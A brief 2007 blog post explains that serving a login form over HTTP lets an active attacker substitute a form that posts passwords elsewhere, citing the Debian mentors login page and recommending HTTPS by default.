Taciturn
Sun 23 Sep 2007
Transmitting passwords over HTTPS is safe, but serving the login form over HTTP is not. The attack vector is that an active attacker can send a custom login form with a different form submission address, compromising users' passwords.
I noticed this when using the Debian mentors login. Fortunately the login page is also available over HTTPS if you adjust the URI yourself, but ideally it would be the default.
Comments are disabled on this post.
Also available in
RSS.
Comments
There are no comments on this entry.